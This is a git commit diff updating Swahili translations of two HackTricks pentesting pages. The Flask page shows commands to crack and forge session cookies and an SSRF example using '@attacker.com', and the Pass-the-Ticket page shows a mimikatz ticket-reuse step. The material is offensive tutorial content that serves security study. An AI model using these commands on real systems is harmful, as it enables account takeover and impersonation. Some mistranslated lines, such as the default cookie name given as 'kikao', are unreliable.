mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind
This commit is contained in:
parent
252046b0a8
commit
72dffef4f3
2 changed files with 32 additions and 32 deletions
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
|
@ -10,30 +10,30 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia mchakato** kwa urahisi uliosukumwa na zana za **jamii za juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
|
||||
|
||||
**Labda ikiwa unacheza CTF programu ya Flask itahusiana na** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
|
||||
|
||||
## Vidakuzi
|
||||
## Cookies
|
||||
|
||||
Jina la kikao cha kuki cha chaguo-msingi ni **`session`**.
|
||||
Jina la kikao cha biskuti cha chaguo-msingi ni **`kikao`**.
|
||||
|
||||
### Mchawi
|
||||
|
||||
Dukizi ya mtandaoni ya Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
||||
Mchawi wa mtandaoni wa biskuti za Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
||||
|
||||
#### Mwongozo
|
||||
|
||||
Pata sehemu ya kwanza ya kuki hadi alama ya kwanza na ikibadilishe kwa Base64>
|
||||
Pata sehemu ya kwanza ya biskuti hadi alama ya kwanza na ikodishe Base64>
|
||||
```bash
|
||||
echo "ImhlbGxvIg" | base64 -d
|
||||
```
|
||||
|
@ -41,7 +41,7 @@ Cookie pia inasainiwa kutumia nenosiri
|
|||
|
||||
### **Flask-Unsign**
|
||||
|
||||
Zana ya mstari wa amri kutafuta, kudecode, kufanya nguvu ya kutumia na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
|
||||
Zana ya mstari wa amri ya kupata, kudecode, kufanya nguvu ya kutumia nguvu na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
|
||||
|
||||
{% embed url="https://pypi.org/project/flask-unsign/" %}
|
||||
```bash
|
||||
|
@ -59,13 +59,13 @@ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<coo
|
|||
```bash
|
||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
||||
```
|
||||
#### Kusaini kwa kutumia toleo la zamani (legacy)
|
||||
#### Kusaini kwa kutumia toleo la zamani (la zamani)
|
||||
```bash
|
||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
||||
```
|
||||
### **RIPsession**
|
||||
|
||||
Chombo cha amri ya mstari wa amri kutumia nguvu kwenye tovuti kutumia vidakuzi vilivyoundwa na flask-unsign.
|
||||
Chombo cha mstari wa amri kutumika kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.
|
||||
|
||||
{% embed url="https://github.com/Tagvi/ripsession" %}
|
||||
```bash
|
||||
|
@ -73,11 +73,11 @@ ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s p
|
|||
```
|
||||
### SQLi katika kuki ya kikao cha Flask na SQLmap
|
||||
|
||||
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa flask kwa kutumia siri inayojulikana.
|
||||
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa kutumia siri inayojulikana kwa flask.
|
||||
|
||||
## Flask Proxy kwa SSRF
|
||||
|
||||
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezewa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
|
||||
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezwa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
|
||||
```http
|
||||
GET @/ HTTP/1.1
|
||||
Host: target.com
|
||||
|
@ -98,14 +98,14 @@ return get(f'{SITE_NAME}{path}').content
|
|||
|
||||
app.run(host='0.0.0.0', port=8080)
|
||||
```
|
||||
Inaweza kuruhusu kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
|
||||
Hakikisha kuwezesha kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii za **juu zaidi** ulimwenguni.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -115,8 +115,8 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,29 +2,29 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii yenye maendeleo zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** ulimwenguni.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
|
||||
|
||||
## Pita Tiketi (PTT)
|
||||
|
||||
Katika njia ya udukuzi ya **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
|
||||
Katika njia ya kushambulia **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
|
||||
|
||||
**Soma**:
|
||||
|
||||
|
@ -67,21 +67,21 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
|
|||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za **jamii ya juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue